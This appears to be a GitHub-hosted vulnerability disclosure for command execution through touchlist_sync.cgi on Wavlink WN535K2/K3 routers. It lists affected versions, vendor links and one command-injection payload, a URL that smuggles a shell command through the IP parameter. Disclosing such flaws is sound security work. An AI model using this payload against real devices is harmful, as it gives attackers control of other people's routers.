Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

###Wavlink touchlist_sync.cgi command execution

Exploit Title

Wavlink touchlist_sync.cgicommand execution

Exploit Author

webraybtl@webray.com.cn inc

Vulnerability condition

Unlimited front desk

Vendor Homepage

https://www.wavlink.com

Software Link

https://www.wavlink.com/zh_cn/firmware.html

Version

WN535K2/K3

Description

There is a command execution vulnerability in wavlink, through which an attacker can gain server privileges

Payload used

/cgi-bin/touchlist_sync.cgi?IP=;cmd;

Proof of Concept

image-20220704141147087

image-20220720101113802

image-20220720101128054